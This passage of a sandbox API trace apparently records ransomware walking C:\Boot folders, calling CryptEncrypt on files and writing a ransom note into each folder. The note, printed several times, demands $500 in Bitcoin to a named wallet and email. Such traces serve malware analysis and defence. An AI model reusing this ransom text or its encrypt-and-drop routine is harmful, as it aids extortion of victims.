"c:\\boot\\en-us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.577] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.577] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.578] lstrlenA (lpString="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") returned 684 [0044.578] 
WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.578] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.578] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.578] CloseHandle (hObject=0xa4) returned 1 [0044.578] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="Program Files") returned -1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="Program Files (x86)") returned -1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="$Recycle.bin") returned 1 [0044.578] lstrcmpiW (lpString1="es-ES", lpString2="System Volume Information") returned -1 [0044.578] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0044.578] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0044.578] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0044.578] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0044.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.579] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.579] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.579] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0044.579] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.579] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.579] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0044.579] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.579] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.579] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.579] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.579] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.579] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.579] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.579] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0044.579] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.579] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.580] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.580] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.580] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0044.580] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.580] 
lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.580] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.580] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.580] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.580] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.580] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.580] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\RESTORE_FILES.txt") returned 35 [0044.580] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\RESTORE_FILES.txt" (normalized: "c:\\boot\\es-es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.580] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.580] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.581] lstrlenA (lpString="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") returned 684 [0044.581] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.581] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.581] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.581] CloseHandle (hObject=0xa4) returned 1 [0044.581] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="Program Files") returned -1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="Program Files (x86)") returned -1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="$Recycle.bin") returned 1 [0044.581] lstrcmpiW (lpString1="fi-FI", lpString2="System Volume Information") returned -1 [0044.581] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0044.581] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0044.581] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0044.581] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0044.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c00 [0044.582] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.582] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.582] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.582] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.582] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.582] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0044.582] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.582] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.582] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.582] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.582] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.582] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.582] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.582] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0044.582] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.582] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.582] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.582] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.582] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0044.582] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.582] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.582] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.582] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447c40*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.582] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0044.582] FindNextFileW (in: hFindFile=0x447c00, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.582] FindClose (in: hFindFile=0x447c00 | out: hFindFile=0x447c00) returned 1 [0044.582] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\RESTORE_FILES.txt") returned 35 [0044.582] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\RESTORE_FILES.txt" (normalized: "c:\\boot\\fi-fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0044.583] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.583] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.583] lstrlenA (lpString="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") returned 684 [0044.583] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.583] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.583] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, 
lpOverlapped=0x0) returned 1 [0044.583] CloseHandle (hObject=0xa4) returned 1 [0044.584] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="Program Files") returned -1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="Program Files (x86)") returned -1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="$Recycle.bin") returned 1 [0044.584] lstrcmpiW (lpString1="Fonts", lpString2="System Volume Information") returned -1 [0044.584] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0044.584] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0044.584] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0044.584] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0044.584] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.587] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.587] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.587] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.587] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.587] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.587] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0044.587] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.587] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.587] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.587] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 
[0044.587] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.587] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.587] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.587] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0044.587] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.587] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.587] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Windows") returned -1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Program Files") returned -1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Program Files (x86)") returned -1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.587] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="System Volume Information") returned -1 [0044.587] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0044.587] StrStrIW (lpFirst="chs_boot.ttf", lpSrch=".protected") returned 0x0 [0044.587] lstrcmpW (lpString1="chs_boot.ttf", lpString2="RESTORE_FILES.txt") returned -1 [0044.587] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.587] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.587] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.587] 
FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.587] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Windows") returned -1 [0044.587] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Program Files") returned -1 [0044.587] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Program Files (x86)") returned -1 [0044.588] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.588] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="System Volume Information") returned -1 [0044.588] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0044.588] StrStrIW (lpFirst="cht_boot.ttf", lpSrch=".protected") returned 0x0 [0044.588] lstrcmpW (lpString1="cht_boot.ttf", lpString2="RESTORE_FILES.txt") returned -1 [0044.588] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.588] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.588] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.589] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Windows") returned -1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Program Files") returned -1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.589] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="System 
Volume Information") returned -1 [0044.589] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0044.589] StrStrIW (lpFirst="jpn_boot.ttf", lpSrch=".protected") returned 0x0 [0044.589] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="RESTORE_FILES.txt") returned -1 [0044.589] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.589] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.589] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.589] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Windows") returned -1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Program Files") returned -1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Program Files (x86)") returned -1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.589] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="System Volume Information") returned -1 [0044.589] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0044.589] StrStrIW (lpFirst="kor_boot.ttf", lpSrch=".protected") returned 0x0 [0044.589] lstrcmpW (lpString1="kor_boot.ttf", lpString2="RESTORE_FILES.txt") returned -1 [0044.589] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.589] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.589] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.590] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Windows") returned -1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Program Files") returned 1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Program Files (x86)") returned 1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="$Recycle.bin") returned 1 [0044.590] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="System Volume Information") returned 1 [0044.590] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0044.590] StrStrIW (lpFirst="wgl4_boot.ttf", lpSrch=".protected") returned 0x0 [0044.590] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="RESTORE_FILES.txt") returned 1 [0044.590] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.590] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.590] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.590] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: 
